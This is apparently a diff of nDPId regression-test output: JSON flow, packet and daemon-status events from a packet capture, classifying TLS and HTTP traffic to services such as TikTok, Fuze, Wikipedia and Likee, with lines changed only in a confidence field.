+00958{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1623221441867,"flow_last_seen":1623221441911,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1623221441911,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"92.122.95.99","src_port":41878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TikTok","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"vcs-va.tiktokv.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":31,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1595957694169,"flow_last_seen":1595957694188,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1623221442073,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"69.171.250.20","src_port":46160,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Messenger","breed":"Acceptable","category":"Chat"}} 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":36,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":36,"packets-processed":35,"total-skipped-flows":0,"total-l4-payload-len":9095,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":2,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":17,"global_ts_msec":1623222051753} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623222051753,"flow_last_seen":1623222051753,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623222051753,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"52.73.71.226","src_port":50071,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1623222051753,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1623222051753,"pkt":"pJGxgjQ56CrqthSFCABFAAA0YDdAAIAGW9bAqAHjNElH4sOXAbv6yL58AAAAAIAC+vC20AAAAgQFtAEDAwgBAQQC"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1623222051852,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1623222051852,"pkt":"6CrqthSFpJGxgjQ5CABFAAA0AABAAOkGUw00SUfiwKgB4wG7w5czz+y6+si+fYASaQMoIwAAAgQFtAEBBAIBAwMI"} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1623222051853,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1623222051853,"pkt":"pJGxgjQ56CrqthSFCABFAAAoYDhAAIAGW+HAqAHjNElH4sOXAbv6yL59M8\/su1AQAgHP+AAAAAAAAAAA"} -00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623222051753,"flow_last_seen":1623222051854,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1623222051854,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"52.73.71.226","src_port":50071,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Fuze","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.fuze.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1623222051753,"flow_last_seen":1623222051957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1623222051957,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"52.73.71.226","src_port":50071,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Fuze","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.fuze.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01192{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1623222051753,"flow_last_seen":1623222051957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5798,"flow_avg_l4_payload_len":644,"midstream":0,"thread_ts_msec":1623222051957,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"52.73.71.226","src_port":50071,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Fuze","breed":"Acceptable","category":"VoIP"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"presence.fuze.com","server_names":"*.presence.fuze.com,presence.fuze.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Amazon, OU=Server CA 1B, CN=Amazon","subjectDN":"CN=*.presence.fuze.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"B4:E1:85:91:CD:36:0A:89:7B:6F:A0:C1:11:B5:A5:29:CE:05:13:79"}} -00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":60,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1623221441867,"flow_last_seen":1623221458497,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8498,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1623222052202,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"92.122.95.99","src_port":41878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.TikTok","breed":"Fun","category":"SocialNetwork"}} +00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623222051753,"flow_last_seen":1623222051854,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1623222051854,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"52.73.71.226","src_port":50071,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Fuze","breed":"Acceptable","category":"VoIP"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"presence.fuze.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1623222051753,"flow_last_seen":1623222051957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1623222051957,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"52.73.71.226","src_port":50071,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Fuze","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.fuze.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01192{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1623222051753,"flow_last_seen":1623222051957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5798,"flow_avg_l4_payload_len":644,"midstream":0,"thread_ts_msec":1623222051957,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"52.73.71.226","src_port":50071,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Fuze","breed":"Acceptable","category":"VoIP"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"presence.fuze.com","server_names":"*.presence.fuze.com,presence.fuze.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Amazon, OU=Server CA 1B, CN=Amazon","subjectDN":"CN=*.presence.fuze.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"B4:E1:85:91:CD:36:0A:89:7B:6F:A0:C1:11:B5:A5:29:CE:05:13:79"}} +00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":60,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1623221441867,"flow_last_seen":1623221458497,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8498,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1623222052202,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"92.122.95.99","src_port":41878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TikTok","breed":"Fun","category":"SocialNetwork"}} 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":67,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":67,"packets-processed":66,"total-skipped-flows":0,"total-l4-payload-len":17875,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":4,"total-updates":0,"current-active-flows":1,"total-active-flows":3,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":26,"global_ts_msec":1623223595952} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":67,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623223595952,"flow_last_seen":1623223595952,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623223595952,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"91.198.174.208","src_port":50620,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1623223595952,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1623223595952,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8ZBhAAEAGCeXAqAGAW8au0MW8AbvaIBcHAAAAAKAC+vC78AAAAgQFtAQCCAq86k7VAAAAAAEDAwc="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1623223595999,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1623223595999,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADEGfP1bxq7QwKgBgAG7xbxrNtsg2iAXCKASqbDzDgAAAgQFnAQCCAoXn7wwvOpO1QEDAwk="} 
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1623223596002,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1623223596002,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0ZBlAAEAGCezAqAGAW8au0MW8AbvaIBcIazbbIYAQAfbJTQAAAQEICrzqTwcXn7ww"} -00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623223595952,"flow_last_seen":1623223596004,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1623223596004,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"91.198.174.208","src_port":50620,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Wikipedia","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"upload.wikimedia.org","ja3":"6b5e0cfe988c723ee71faf54f8460684","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":72,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1623223595952,"flow_last_seen":1623223596052,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1623223596052,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"91.198.174.208","src_port":50620,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Wikipedia","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"upload.wikimedia.org","ja3":"6b5e0cfe988c723ee71faf54f8460684","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":107,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1623222051753,"flow_last_seen":1623222112185,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8780,"flow_avg_l4_payload_len":283,"midstream":0,"thread_ts_msec":1623223596203,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"52.73.71.226","src_port":50071,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Fuze","breed":"Acceptable","category":"VoIP"}} +00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623223595952,"flow_last_seen":1623223596004,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1623223596004,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"91.198.174.208","src_port":50620,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Wikipedia","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"upload.wikimedia.org","ja3":"6b5e0cfe988c723ee71faf54f8460684","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":72,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1623223595952,"flow_last_seen":1623223596052,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1623223596052,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"91.198.174.208","src_port":50620,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Wikipedia","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"upload.wikimedia.org","ja3":"6b5e0cfe988c723ee71faf54f8460684","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":107,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1623222051753,"flow_last_seen":1623222112185,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8780,"flow_avg_l4_payload_len":283,"midstream":0,"thread_ts_msec":1623223596203,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"52.73.71.226","src_port":50071,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Fuze","breed":"Acceptable","category":"VoIP"}} 
00558{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":119,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":119,"packets-processed":118,"total-skipped-flows":0,"total-l4-payload-len":35609,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":5,"total-updates":0,"current-active-flows":1,"total-active-flows":4,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":34,"global_ts_msec":1623226283573} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623226283573,"flow_last_seen":1623226283573,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623226283573,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"45.82.241.51","src_port":39890,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1623226283573,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1623226283573,"pkt":"pJGxgjQ5AoEfHBPlCABFAAA8M5RAAEAGJgDAqAH6LVLxM5vSAFAXgCu+AAAAAKAC\/\/9tawAAAgQFtAQCCAolvfRMAAAAAAEDAwk="} 
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1623226283601,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1623226283601,"pkt":"AoEfHBPlpJGxgjQ5CABFAAA0AABAADMGZpwtUvEzwKgB+gBQm9LNImc9F4Arv4ASchAIQAAAAgQFeAEBBAIBAwMK"} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1623226283602,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1623226283602,"pkt":"pJGxgjQ5AoEfHBPlCABFAAAoM5VAAEAGJhPAqAH6LVLxM5vSAFAXgCu\/zSJnPlAQAKy6PQAAAAAAAAAA"} -00823{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623226283573,"flow_last_seen":1623226283612,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1623226283612,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"45.82.241.51","src_port":39890,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Likee","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"videosnap.like.video","url":"videosnap.like.video\/eu_live\/5uz\/1YOmxT.webp?type=8&resize=1&dw=360","code":0,"content_type":"","user_agent":"Like-Android"}} 
-00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":229,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1623223595952,"flow_last_seen":1623223766553,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":17734,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1623226286427,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"91.198.174.208","src_port":50620,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Wikipedia","breed":"Safe","category":"Web"}} +00823{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623226283573,"flow_last_seen":1623226283612,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1623226283612,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"45.82.241.51","src_port":39890,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Likee","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"videosnap.like.video","url":"videosnap.like.video\/eu_live\/5uz\/1YOmxT.webp?type=8&resize=1&dw=360","code":0,"content_type":"","user_agent":"Like-Android"}} 
+00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":229,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1623223595952,"flow_last_seen":1623223766553,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":17734,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1623226286427,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"91.198.174.208","src_port":50620,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Wikipedia","breed":"Safe","category":"Web"}} 00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":231,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":231,"packets-processed":230,"total-skipped-flows":0,"total-l4-payload-len":108050,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":5,"total-updates":0,"current-active-flows":1,"total-active-flows":5,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":41,"global_ts_msec":1631088115362} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":231,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1631088115362,"flow_last_seen":1631088115362,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1631088115362,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"199.232.82.109","src_port":46724,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
